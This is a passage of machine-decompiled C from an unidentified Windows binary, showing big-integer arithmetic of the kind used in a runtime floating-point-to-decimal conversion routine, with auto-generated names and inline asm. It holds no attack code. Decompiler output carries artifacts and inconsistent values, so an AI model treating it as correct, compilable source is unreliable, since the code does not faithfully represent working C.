											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1084 = 0;
												__eflags = 0;
											} else {
												_t1084 = _t793 + 1;
											}
											_t794 = 0x20;
											_t795 = _t794 - _t1084;
											__eflags = _t795 - 1;
											_t796 = _t795 & 0xffffff00 | _t795 - 0x00000001 > 0x00000000;
											__eflags = _t1064 - 0x73;
											_v1865 = _t796;
											_t1085 = _t1084 & 0xffffff00 | _t1064 - 0x00000073 > 0x00000000;
											__eflags = _t1064 - 0x73;
											if(_t1064 != 0x73) {
												L107:
												_t797 = 0;
												__eflags = 0;
											} else {
												__eflags = _t796;
												if(_t796 == 0) {
													goto L107;
												} else {
													_t797 = 1;
												}
											}
											__eflags = _t1085;
											if(_t1085 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E00BCB3C1( &_v468, 0x1cc,  &_v1396, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												__eflags = _t797;
												if(_t797 != 0) {
													goto L126;
												} else {
													_t1112 = 0x72;
													__eflags = _t1064 - _t1112;
													if(_t1064 < _t1112) {
														_t1112 = _t1064;
													}
													__eflags = _t1112 - 0xffffffff;
													if(_t1112 != 0xffffffff) {
														_t1263 = _t1112;
														_t1221 =  &_v468 + _t1112 * 4;
														_v1880 = _t1221;
														while(1) {
															__eflags = _t1263 - _t1064;
															if(_t1263 >= _t1064) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1221;
															}
															_t210 = _t1263 - 1; // 0x70
															__eflags = _t210 - _t1064;
															if(_t210 >= _t1064) {
																_t1173 = 0;
																__eflags = 0;
															} else {
																_t1173 =  *(_t1221 - 4);
															}
															_t1221 = _t1221 - 4;
															_t975 = _v1880;
															_t1263 = _t1263 - 1;
															 *_t975 = _t1173 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t975 - 4;
															__eflags = _t1263 - 0xffffffff;
															if(_t1263 == 0xffffffff) {
																break;
															}
															_t1064 = _v472;
														}
														_t1245 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1112;
													} else {
														_t218 = _t1112 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1197 = 1 - _t1245;
											E00BBF1A0(_t1197,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1276 + 0xbad63d) = 1 << (_t1197 & 0x0000001f);
											_t806 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1113 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1113;
											__eflags = _t1064 - _t1113;
											if(_t1064 == _t1113) {
												_t1177 = 0;
												__eflags = 0;
												while(1) {
													_t977 =  *((intOrPtr*)(_t1276 + _t1177 - 0x570));
													__eflags = _t977 -  *((intOrPtr*)(_t1276 + _t1177 - 0x1d0));
													if(_t977 !=  *((intOrPtr*)(_t1276 + _t1177 - 0x1d0))) {
														goto L101;
													}
													_t1177 = _t1177 + 4;
													__eflags = _t1177 - 8;
													if(_t1177 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1178 = 0;
															__eflags = 0;
														} else {
															_t1178 = _t977 + 1;
														}
														_t978 = 0x20;
														_t1264 = _t1113;
														__eflags = _t978 - _t1178 - _t1113;
														_t980 =  &_v460;
														_v1880 = _t980;
														_t1222 = _t980;
														_t171 =  &_v1865;
														 *_t171 = _t978 - _t1178 - _t1113 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1264 - _t1064;
															if(_t1264 >= _t1064) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1222;
															}
															_t175 = _t1264 - 1; // 0x0
															__eflags = _t175 - _t1064;
															if(_t175 >= _t1064) {
																_t1179 = 0;
																__eflags = 0;
															} else {
																_t1179 =  *(_t1222 - 4);
															}
															_t1222 = _t1222 - 4;
															_t984 = _v1880;
															_t1264 = _t1264 - 1;
															 *_t984 = _t1179 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t984 - 4;
															__eflags = _t1264 - 0xffffffff;
															if(_t1264 == 0xffffffff) {
																break;
															}
															_t1064 = _v472;
														}
														__eflags = _v1865;
														_t1114 = _t1113 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1113;
														_t1224 = _t1114 >> 5;
														_v1884 = _t1114;
														_t1266 = _t1224 << 2;
														E00BBF1A0(_t1224,  &_v1396, 0, _t1266);
														 *(_t1276 + _t1266 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t806 = _t1224 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t806;
										_t1067 = 0x1cc;
										_v936 = _t806;
										__eflags = _t806 << 2;
										E00BCB3C1( &_v932, 0x1cc,  &_v1396, _t806 << 2);
										_t1282 =  &(_t1279[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1267 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1267;
										__eflags = _t1064 - _t1267;
										if(_t1064 != _t1267) {
											L53:
											_t995 = _v1872 + 1;
											_t996 = _t995 & 0x0000001f;
											_t1117 = 0x20;
											_v1876 = _t996;
											_t1226 = _t995 >> 5;
											_v1872 = _t1226;
											_v1908 = _t1117 - _t996;
											_t999 = E00BBE600(1, _t1117 - _t996, 0);
											_t1119 =  *((intOrPtr*)(_t1276 + _t1064 * 4 - 0x1d4));
											_t1000 = _t999 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t1000;
											_v1912 =  !_t1000;
											if( *_t108 == 0) {
												_t1120 = 0;
												__eflags = 0;
											} else {
												_t1120 = _t1119 + 1;
											}
											_t1002 = 0x20;
											_t1003 = _t1002 - _t1120;
											_t1184 = _t1064 + _t1226;
											__eflags = _v1876 - _t1003;
											_v1892 = _t1184;
											_t1004 = _t1003 & 0xffffff00 | _v1876 - _t1003 > 0x00000000;
											__eflags = _t1184 - 0x73;
											_v1865 = _t1004;
											_t1121 = _t1120 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
											__eflags = _t1184 - 0x73;
											if(_t1184 != 0x73) {
												L59:
												_t1005 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1004;
												if(_t1004 == 0) {
													goto L59;
												} else {
													_t1005 = 1;
												}
											}
											__eflags = _t1121;
											if(_t1121 != 0) {
												L81:
												__eflags = 0;
												_t1067 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E00BCB3C1( &_v468, 0x1cc,  &_v1396, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												__eflags = _t1005;
												if(_t1005 != 0) {
													goto L81;
												} else {
													_t1122 = 0x72;
													__eflags = _t1184 - _t1122;
													if(_t1184 >= _t1122) {
														_t1184 = _t1122;
														_v1892 = _t1122;
													}
													_t1015 = _t1184;
													_v1880 = _t1015;
													__eflags = _t1184 - 0xffffffff;
													if(_t1184 != 0xffffffff) {
														_t1185 = _v1872;
														_t1269 = _t1184 - _t1185;
														__eflags = _t1269;
														_t1126 =  &_v468 + _t1269 * 4;
														_v1888 = _t1126;
														while(1) {
															__eflags = _t1015 - _t1185;
															if(_t1015 < _t1185) {
																break;
															}
															__eflags = _t1269 - _t1064;
															if(_t1269 >= _t1064) {
																_t1229 = 0;
																__eflags = 0;
															} else {
																_t1229 =  *_t1126;
															}
															__eflags = _t1269 - 1 - _t1064;
															if(_t1269 - 1 >= _t1064) {
																_t1020 = 0;
																__eflags = 0;
															} else {
																_t1020 =  *(_t1126 - 4);
															}
															_t1023 = _v1880;
															_t1126 = _v1888 - 4;
															_v1888 = _t1126;
															 *(_t1276 + _t1023 * 4 - 0x1d0) = (_t1229 & _v1884) << _v1876 | (_t1020 & _v1912) >> _v1908;
															_t1015 = _t1023 - 1;
															_t1269 = _t1269 - 1;
															_v1880 = _t1015;
															__eflags = _t1015 - 0xffffffff;
															if(_t1015 != 0xffffffff) {
																_t1064 = _v472;
																continue;
															}
															break;
														}
														_t1184 = _v1892;
														_t1226 = _v1872;
														_t1267 = 2;
													}
													__eflags = _t1226;
													if(_t1226 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1226 << 2);
														_t1279 =  &(_t1279[3]);
													}
													__eflags = _v1865;
													_t1067 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1184;
													} else {
														_v472 = _t1184 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1267;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1130 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1276 + _t1130 - 0x570)) -  *((intOrPtr*)(_t1276 + _t1130 - 0x1d0));
												if( *((intOrPtr*)(_t1276 + _t1130 - 0x570)) !=  *((intOrPtr*)(_t1276 + _t1130 - 0x1d0))) {
													goto L53;
												}
												_t1130 = _t1130 + 4;
												__eflags = _t1130 - 8;
												if(_t1130 != 8) {
													continue;
												} else {
													_t1026 = _v1872 + 2;
													_t1027 = _t1026 & 0x0000001f;
													_t1131 = 0x20;
													_t1132 = _t1131 - _t1027;
													_v1888 = _t1027;
													_t1271 = _t1026 >> 5;
													_v1876 = _t1271;
													_v1908 = _t1132;
													_t1030 = E00BBE600(1, _t1132, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1031 = _t1030 - 1;
													__eflags = _t1031;
													asm("bsr ecx, edi");
													_v1884 = _t1031;
													_v1912 =  !_t1031;
													if(_t1031 == 0) {
														_t1133 = 0;
														__eflags = 0;
													} else {
														_t1133 = _t1132 + 1;
													}
													_t1033 = 0x20;
													_t1034 = _t1033 - _t1133;
													_t1187 = _t1271 + 2;
													__eflags = _v1888 - _t1034;
													_v1880 = _t1187;
													_t1035 = _t1034 & 0xffffff00 | _v1888 - _t1034 > 0x00000000;
													__eflags = _t1187 - 0x73;
													_v1865 = _t1035;
													_t1134 = _t1133 & 0xffffff00 | _t1187 - 0x00000073 > 0x00000000;
													__eflags = _t1187 - 0x73;
													if(_t1187 != 0x73) {
														L28:
														_t1036 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1035;
														if(_t1035 == 0) {
															goto L28;
														} else {
															_t1036 = 1;
														}
													}
													__eflags = _t1134;
													if(_t1134 != 0) {
														L50:
														__eflags = 0;
														_t1067 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E00BCB3C1( &_v468, 0x1cc,  &_v1396, 0);
														_t1279 =  &(_t1279[4]);
													} else {
														__eflags = _t1036;
														if(_t1036 != 0) {
															goto L50;
														} else {
															_t1137 = 0x72;
															__eflags = _t1187 - _t1137;
															if(_t1187 >= _t1137) {
																_t1187 = _t1137;
																_v1880 = _t1137;
															}
															_t1138 = _t1187;
															_v1892 = _t1138;
															__eflags = _t1187 - 0xffffffff;
															if(_t1187 != 0xffffffff) {
																_t1188 = _v1876;
																_t1273 = _t1187 - _t1188;
																__eflags = _t1273;
																_t1046 =  &_v468 + _t1273 * 4;
																_v1872 = _t1046;
																while(1) {
																	__eflags = _t1138 - _t1188;
																	if(_t1138 < _t1188) {
																		break;
																	}
																	__eflags = _t1273 - _t1064;
																	if(_t1273 >= _t1064) {
																		_t1235 = 0;
																		__eflags = 0;
																	} else {
																		_t1235 =  *_t1046;
																	}
																	__eflags = _t1273 - 1 - _t1064;
																	if(_t1273 - 1 >= _t1064) {
																		_t1048 = 0;
																		__eflags = 0;
																	} else {
																		_t1048 =  *(_v1872 - 4);
																	}
																	_t1143 = _v1892;
																	 *(_t1276 + _t1143 * 4 - 0x1d0) = (_t1048 & _v1912) >> _v1908 | (_t1235 & _v1884) << _v1888;
																	_t1138 = _t1143 - 1;
																	_t1273 = _t1273 - 1;
																	_t1046 = _v1872 - 4;
																	_v1892 = _t1138;
																	_v1872 = _t1046;
																	__eflags = _t1138 - 0xffffffff;
																	if(_t1138 != 0xffffffff) {
																		_t1064 = _v472;
																		continue;
																	}
																	break;
																}
																_t1187 = _v1880;
																_t1271 = _v1876;
															}
															__eflags = _t1271;
															if(_t1271 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1271 << 2);
																_t1279 =  &(_t1279[3]);
															}
															__eflags = _v1865;
															_t1067 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1187;
															} else {
																_v472 = _t1187 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1041 = 4;
													__eflags = 1;
													_v1396 = _t1041;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1041);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1067);
										_push( &_v932);
										E00BCB3C1();
										_t1282 =  &(_t1279[4]);
									}
									_t811 = _v1904;
									_t1087 = 0xa;
									_v1912 = _t1087;
									__eflags = _t811;
									if(_t811 < 0) {
										_t812 =  ~_t811;
										_t813 = _t812 / _t1087;
										_v1880 = _t813;
										_t1088 = _t812 % _t1087;
										_v1884 = _t1088;
										__eflags = _t813;
										if(_t813 == 0) {
											L249:
											__eflags = _t1088;
											if(_t1088 != 0) {
												_t852 =  *(0xbd6d6c + _t1088 * 4);
												_v1896 = _t852;
												__eflags = _t852;
												if(_t852 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t852 - 1;
													if(_t852 != 1) {
														_t1099 = _v472;
														__eflags = _t1099;
														if(_t1099 != 0) {
															_t1204 = 0;
															_t1253 = 0;
															__eflags = 0;
															do {
																_t1158 = _t852 *  *(_t1276 + _t1253 * 4 - 0x1d0) >> 0x20;
																 *(_t1276 + _t1253 * 4 - 0x1d0) = _t852 *  *(_t1276 + _t1253 * 4 - 0x1d0) + _t1204;
																_t852 = _v1896;
																asm("adc edx, 0x0");
																_t1253 = _t1253 + 1;
																_t1204 = _t1158;
																__eflags = _t1253 - _t1099;
															} while (_t1253 != _t1099);
															__eflags = _t1204;
															if(_t1204 != 0) {
																_t859 = _v472;
																__eflags = _t859 - 0x73;
																if(_t859 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1276 + _t859 * 4 - 0x1d0) = _t1204;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t813 - 0x26;
												if(_t813 > 0x26) {
													_t813 = 0x26;
												}
												_t1100 =  *(0xbd6cd6 + _t813 * 4) & 0x000000ff;
												_v1872 = _t813;
												_v1400 = ( *(0xbd6cd6 + _t813 * 4) & 0x000000ff) + ( *(0xbd6cd7 + _t813 * 4) & 0x000000ff);
												E00BBF1A0(_t1100 << 2,  &_v1396, 0, _t1100 << 2);
												_t870 = E00BBF300( &(( &_v1396)[_t1100]), 0xbd63d0 + ( *(0xbd6cd4 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xbd6cd7 + _t813 * 4) & 0x000000ff) << 2);
												_t1101 = _v1400;
												_t1282 =  &(_t1282[6]);
												_v1892 = _t1101;
												__eflags = _t1101 - 1;
												if(_t1101 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1101 - _v472;
														_t1207 =  &_v1396;
														_t871 = _t870 & 0xffffff00 | _t1101 - _v472 > 0x00000000;
														__eflags = _t871;
														if(_t871 != 0) {
															_t1159 =  &_v468;
														} else {
															_t1207 =  &_v468;
															_t1159 =  &_v1396;
														}
														_v1908 = _t1159;
														__eflags = _t871;
														if(_t871 == 0) {
															_t1101 = _v472;
														}
														_v1876 = _t1101;
														__eflags = _t871;
														if(_t871 != 0) {
															_v1892 = _v472;
														}
														_t1160 = 0;
														_t1255 = 0;
														_v1864 = 0;
														__eflags = _t1101;
														if(_t1101 == 0) {
															L243:
															_v472 = _t1160;
															_t873 = _t1160 << 2;
															__eflags = _t873;
															_push(_t873);
															_t874 =  &_v1860;
															goto L244;
														} else {
															_t1208 = _t1207 -  &_v1860;
															__eflags = _t1208;
															_v1928 = _t1208;
															do {
																_t881 =  *(_t1276 + _t1208 + _t1255 * 4 - 0x740);
																_v1896 = _t881;
																__eflags = _t881;
																if(_t881 != 0) {
																	_t882 = 0;
																	_t1209 = 0;
																	_t1102 = _t1255;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1102 - 0x73;
																		if(_t1102 == 0x73) {
																			goto L258;
																		} else {
																			_t1208 = _v1928;
																			_t1101 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1102 - 0x73;
																			if(_t1102 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1102 - _t1160;
																			if(_t1102 == _t1160) {
																				 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) & 0x00000000;
																				_t894 = _t882 + 1 + _t1255;
																				__eflags = _t894;
																				_v1864 = _t894;
																				_t882 = _v1888;
																			}
																			_t889 =  *(_v1908 + _t882 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) + _t889 * _v1896 + _t1209;
																			asm("adc edx, 0x0");
																			_t882 = _v1888 + 1;
																			_t1102 = _t1102 + 1;
																			_v1888 = _t882;
																			_t1209 = _t889 * _v1896 >> 0x20;
																			_t1160 = _v1864;
																			__eflags = _t882 - _v1892;
																			if(_t882 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1209;
																				if(_t1209 == 0) {
																					goto L240;
																				}
																				__eflags = _t1102 - 0x73;
																				if(_t1102 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1102 - _t1160;
																					if(_t1102 == _t1160) {
																						_t558 = _t1276 + _t1102 * 4 - 0x740;
																						 *_t558 =  *(_t1276 + _t1102 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1102 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t887 = _t1209;
																					_t1209 = 0;
																					 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) + _t887;
																					_t1160 = _v1864;
																					asm("adc edi, edi");
																					_t1102 = _t1102 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1255 - _t1160;
																	if(_t1255 == _t1160) {
																		 *(_t1276 + _t1255 * 4 - 0x740) =  *(_t1276 + _t1255 * 4 - 0x740) & _t881;
																		_t526 = _t1255 + 1; // 0x1
																		_t1160 = _t526;
																		_v1864 = _t1160;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1255 = _t1255 + 1;
																__eflags = _t1255 - _t1101;
															} while (_t1255 != _t1101);
															goto L243;
														}
													} else {
														_t1210 = _v468;
														_v472 = _t1101;
														E00BCB3C1( &_v468, _t1067,  &_v1396, _t1101 << 2);
														_t1282 =  &(_t1282[4]);
														__eflags = _t1210;
														if(_t1210 == 0) {
															goto L203;
														} else {
															__eflags = _t1210 - 1;
															if(_t1210 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1103 = 0;
																	_v1896 = _v472;
																	_t1256 = 0;
																	__eflags = 0;
																	do {
																		_t903 = _t1210;
																		_t1161 = _t903 *  *(_t1276 + _t1256 * 4 - 0x1d0) >> 0x20;
																		 *(_t1276 + _t1256 * 4 - 0x1d0) = _t903 *  *(_t1276 + _t1256 * 4 - 0x1d0) + _t1103;
																		asm("adc edx, 0x0");
																		_t1256 = _t1256 + 1;
																		_t1103 = _t1161;
																		__eflags = _t1256 - _v1896;
																	} while (_t1256 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1211 = _v1396;
													__eflags = _t1211;
													if(_t1211 != 0) {
														__eflags = _t1211 - 1;
														if(_t1211 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1104 = 0;
																_v1896 = _v472;
																_t1257 = 0;
																__eflags = 0;
																do {
																	_t908 = _t1211;
																	_t1162 = _t908 *  *(_t1276 + _t1257 * 4 - 0x1d0) >> 0x20;
																	 *(_t1276 + _t1257 * 4 - 0x1d0) = _t908 *  *(_t1276 + _t1257 * 4 - 0x1d0) + _t1104;
																	asm("adc edx, 0x0");
																	_t1257 = _t1257 + 1;
																	_t1104 = _t1162;
																	__eflags = _t1257 - _v1896;
																} while (_t1257 != _v1896);
																L208:
																__eflags = _t1103;
																if(_t1103 == 0) {
																	goto L245;
																} else {
																	_t906 = _v472;
																	__eflags = _t906 - 0x73;
																	if(_t906 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E00BCB3C1( &_v468, _t1067,  &_v2404, 0);
																		_t1282 =  &(_t1282[4]);
																		_t877 = 0;
																	} else {
																		 *(_t1276 + _t906 * 4 - 0x1d0) = _t1103;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t874 =  &_v2404;
														L244:
														_push(_t874);
														_push(_t1067);
														_push( &_v468);
														E00BCB3C1();
														_t1282 =  &(_t1282[4]);
														L245:
														_t877 = 1;
													}
												}
												L246:
												__eflags = _t877;
												if(_t877 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t855 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t813 = _v1880 - _v1872;
												__eflags = _t813;
												_v1880 = _t813;
											} while (_t813 != 0);
											_t1088 = _v1884;
											goto L249;
										}
									} else {
										_t911 = _t811 / _t1087;
										_v1908 = _t911;
										_t1105 = _t811 % _t1087;
										_v1896 = _t1105;
										__eflags = _t911;
										if(_t911 == 0) {
											L184:
											__eflags = _t1105;
											if(_t1105 != 0) {
												_t1212 =  *(0xbd6d6c + _t1105 * 4);
												__eflags = _t1212;
												if(_t1212 != 0) {
													__eflags = _t1212 - 1;
													if(_t1212 != 1) {
														_t912 = _v936;
														_v1896 = _t912;
														__eflags = _t912;
														if(_t912 != 0) {
															_t1258 = 0;
															_t1106 = 0;
															__eflags = 0;
															do {
																_t913 = _t1212;
																_t1166 = _t913 *  *(_t1276 + _t1106 * 4 - 0x3a0) >> 0x20;
																 *(_t1276 + _t1106 * 4 - 0x3a0) = _t913 *  *(_t1276 + _t1106 * 4 - 0x3a0) + _t1258;
																asm("adc edx, 0x0");
																_t1106 = _t1106 + 1;
																_t1258 = _t1166;
																__eflags = _t1106 - _v1896;
															} while (_t1106 != _v1896);
															__eflags = _t1258;
															if(_t1258 != 0) {
																_t916 = _v936;
																__eflags = _t916 - 0x73;
																if(_t916 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1276 + _t916 * 4 - 0x3a0) = _t1258;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t911 - 0x26;
												if(_t911 > 0x26) {
													_t911 = 0x26;
												}
												_t1107 =  *(0xbd6cd6 + _t911 * 4) & 0x000000ff;
												_v1888 = _t911;
												_v1400 = ( *(0xbd6cd6 + _t911 * 4) & 0x000000ff) + ( *(0xbd6cd7 + _t911 * 4) & 0x000000ff);
												E00BBF1A0(_t1107 << 2,  &_v1396, 0, _t1107 << 2);
												_t929 = E00BBF300( &(( &_v1396)[_t1107]), 0xbd63d0 + ( *(0xbd6cd4 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0xbd6cd7 + _t911 * 4) & 0x000000ff) << 2);
												_t1108 = _v1400;
												_t1282 =  &(_t1282[6]);
												_v1892 = _t1108;
												__eflags = _t1108 - 1;
												if(_t1108 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1108 - _v936;
														_t1215 =  &_v1396;
														_t930 = _t929 & 0xffffff00 | _t1108 - _v936 > 0x00000000;
														__eflags = _t930;
														if(_t930 != 0) {
															_t1167 =  &_v932;
														} else {
															_t1215 =  &_v932;
															_t1167 =  &_v1396;
														}
														_v1876 = _t1167;
														__eflags = _t930;
														if(_t930 == 0) {
															_t1108 = _v936;
														}
														_v1880 = _t1108;
														__eflags = _t930;
														if(_t930 != 0) {
															_v1892 = _v936;
														}
														_t1168 = 0;
														_t1260 = 0;
														_v1864 = 0;
														__eflags = _t1108;
														if(_t1108 == 0) {
															L177:
															_v936 = _t1168;
															_t932 = _t1168 << 2;
															__eflags = _t932;
															goto L178;
														} else {
															_t1216 = _t1215 -  &_v1860;
															__eflags = _t1216;
															_v1928 = _t1216;
															do {
																_t940 =  *(_t1276 + _t1216 + _t1260 * 4 - 0x740);
																_v1884 = _t940;
																__eflags = _t940;
																if(_t940 != 0) {
																	_t941 = 0;
																	_t1217 = 0;
																	_t1109 = _t1260;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1109 - 0x73;
																		if(_t1109 == 0x73) {
																			goto L187;
																		} else {
																			_t1216 = _v1928;
																			_t1108 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1109 - 0x73;
																			if(_t1109 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1109 - _t1168;
																			if(_t1109 == _t1168) {
																				 *(_t1276 + _t1109 * 4 - 0x740) =  *(_t1276 + _t1109 * 4 - 0x740) & 0x00000000;
																				_t953 = _t941 + 1 + _t1260;
																				__eflags = _t953;
																				_v1864 = _t953;
																				_t941 = _v1872;
																			}
																			_t948 =  *(_v1876 + _t941 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1276 + _t1109 * 4 - 0x740) =  *(_t1276 + _t1109 * 4 - 0x740) + _t948 * _v1884 + _t1217;
																			asm("adc edx, 0x0");
																			_t941 = _v1872 + 1;
																			_t1109 = _t1109 + 1;
																			_v1872 = _t941;
																			_t1217 = _t948 * _v1884 >> 0x20;
																			_t1168 = _v1864;
																			__eflags = _t941 - _v1892;
																			if(_t941 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1217;
																				if(_t1217 == 0) {
																					goto L174;
																				}
																				__eflags = _t1109 - 0x73;
																				if(_t1109 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t943 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1109 - _t1168;
																					if(_t1109 == _t1168) {
																						_t370 = _t1276 + _t1109 * 4 - 0x740;
																						 *_t370 =  *(_t1276 + _t1109 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1109 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t946 = _t1217;
																					_t1217 = 0;
																					 *(_t1276 + _t1109 * 4 - 0x740) =  *(_t1276 + _t1109 * 4 - 0x740) + _t946;
																					_t1168 = _v1864;
																					asm("adc edi, edi");
																					_t1109 = _t1109 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1260 - _t1168;
																	if(_t1260 == _t1168) {
																		 *(_t1276 + _t1260 * 4 - 0x740) =  *(_t1276 + _t1260 * 4 - 0x740) & _t940;
																		_t338 = _t1260 + 1; // 0x1
																		_t1168 = _t338;
																		_v1864 = _t1168;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1260 = _t1260 + 1;
																__eflags = _t1260 - _t1108;
															} while (_t1260 != _t1108);
															goto L177;
														}
													} else {
														_t1218 = _v932;
														_v936 = _t1108;
														E00BCB3C1( &_v932, _t1067,  &_v1396, _t1108 << 2);
														_t1282 =  &(_t1282[4]);
														__eflags = _t1218;
														if(_t1218 != 0) {
															__eflags = _t1218 - 1;
															if(_t1218 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1110 = 0;
																	_v1884 = _v936;
																	_t1261 = 0;
																	__eflags = 0;
																	do {
																		_t961 = _t1218;
																		_t1169 = _t961 *  *(_t1276 + _t1261 * 4 - 0x3a0) >> 0x20;
																		 *(_t1276 + _t1261 * 4 - 0x3a0) = _t961 *  *(_t1276 + _t1261 * 4 - 0x3a0) + _t1110;
																		asm("adc edx, 0x0");
																		_t1261 = _t1261 + 1;
																		_t1110 = _t1169;
																		__eflags = _t1261 - _v1884;
																	} while (_t1261 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t933 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1219 = _v1396;
													__eflags = _t1219;
													if(_t1219 != 0) {
														__eflags = _t1219 - 1;
														if(_t1219 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1111 = 0;
																_v1884 = _v936;
																_t1262 = 0;
																__eflags = 0;
																do {
																	_t968 = _t1219;
																	_t1170 = _t968 *  *(_t1276 + _t1262 * 4 - 0x3a0) >> 0x20;
																	 *(_t1276 + _t1262 * 4 - 0x3a0) = _t968 *  *(_t1276 + _t1262 * 4 - 0x3a0) + _t1111;
																	asm("adc edx, 0x0");
																	_t1262 = _t1262 + 1;
																	_t1111 = _t1170;
																	__eflags = _t1262 - _v1884;
